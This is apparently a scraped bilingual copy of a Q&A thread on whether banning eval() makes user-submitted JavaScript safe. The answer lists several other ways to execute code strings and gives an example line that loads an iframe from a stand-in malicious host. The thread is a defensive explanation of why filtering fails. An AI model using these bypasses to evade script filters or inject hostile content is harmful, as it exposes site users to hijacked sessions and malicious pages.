如何让外部代码“安全”运行?只是禁止eval()? [英] How can I make external code 'safe' to run? Just ban eval()?
问题描述
我希望能够让社区成员提供他们自己的javascript代码供其他人使用,因为用户的想象力总是比我想象的要大得多。
I'd like to be able to allow community members to supply their own javascript code for others to use, because the users' imaginations are collectively far greater than anything I could think of.
但这引发了固有的安全问题,特别是当目的是允许外部代码运行时。
But this raises the inherent question of security, particularly when the purpose is to allow external code to run.
所以,我可以从提交中禁止 eval()并完成它吗?或者还有其他方法来评估代码或导致javascript中的大规模恐慌?
So, can I just ban eval() from submissions and be done with it? Or are there other ways to evaluate code or cause mass panic in javascript?
还有其他事情要禁止,但我主要担心的是,除非我能阻止执行字符串,否则我可以规避任何其他用于特定方法的过滤器。可行的,还是我不得不求助于作者提供Web服务接口?
There are other things to disallow, but my main concern is that unless I can prevent strings being executed, whatever other filters I put in for specific methods can be circumvented. Doable, or do I have to resort to demanding the author supplies a web service interface?
推荐答案
或者是否有其他方法来评估代码
Or are there other ways to evaluate code
您无法过滤掉对 eval()的调用在脚本解析级别,因为JavaScript是一种图灵完备语言,可以在其中混淆调用。例如。看看svinto的解决方法。您可以通过用空值覆盖来隐藏 window.eval ,但确实有其他方法来评估代码,包括(仅仅是我的头脑):
You can't filter out calls to eval() at a script-parsing level because JavaScript is a Turing-complete language in which it is possible to obfuscate calls. eg. see svinto's workaround. You could hide window.eval by overwriting it with a null value, but there are indeed other ways to evaluate code, including (just off the top of my head):
- new Function('code')()
- document.write('%3Cscript> code% 3C / script>')
- document.createElement('script')。appendChild(document.createTextNode('code'))
- window。 setTimeout('code',0);
- window.open(...)。eval('code')
- location.href = 'javascript:code'
- 在IE中,style / node.setExpression('someproperty','code')
- 在某些浏览器中,节点。 onsomeevent ='code'; 旧版浏览器中的
- ,Object.prototype.eval('code')
- new Function('code')()
- document.write('%3Cscript>code%3C/script>')
- document.createElement('script').appendChild(document.createTextNode('code'))
- window.setTimeout('code', 0);
- window.open(...).eval('code')
- location.href='javascript:code'
- in IE, style/node.setExpression('someproperty', 'code')
- in some browsers, node.onsomeevent= 'code';
- in older browsers, Object.prototype.eval('code')
或导致javascript中出现大量恐慌?
or cause mass panic in javascript?
好的createElement('iframe')。src ='http://evil.iframeexploitz.ru/aff=2345'是你可以期待的更糟糕的攻击之一......但实际上,当脚本具有控制权时,它可以做任何用户可以在你的网站上做的事情。它可以让他们在你的论坛上发布我是一个大的恋童癖者!一千次,然后删除自己的帐户。例如。
Well createElement('iframe').src='http://evil.iframeexploitz.ru/aff=2345' is one of the worse attacks you can expect... but really, when a script has control, it can do anything a user can on your site. It can make them post "I'm a big old paedophile!" a thousand times on your forums and then delete their own account. For example.
我是否必须诉诸要求作者提供网络服务界面?
do I have to resort to demanding the author supplies a web service interface?
是,或者:
- 什么都不做,让想要这个功能的用户下载GreaseMonkey
- 审核每个脚本提交自己
- 使用您自己(可能类似于JavaScript)的迷你语言实际控制
后者可能感兴趣的一个例子是 Google Caja 。我不完全确定我会信任它;这是一项艰苦的工作,他们到目前为止肯定有一些安全漏洞,但如果你真的必须采用这种方法,那就是最好的。
an example of the latter that may interest you is Google Caja. I'm not entirely sure I'd trust it; it's a hard job and they've certainly had some security holes so far, but it's about the best there is if you really must take this approach.
这篇关于如何让外部代码“安全”运行?只是禁止eval()?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
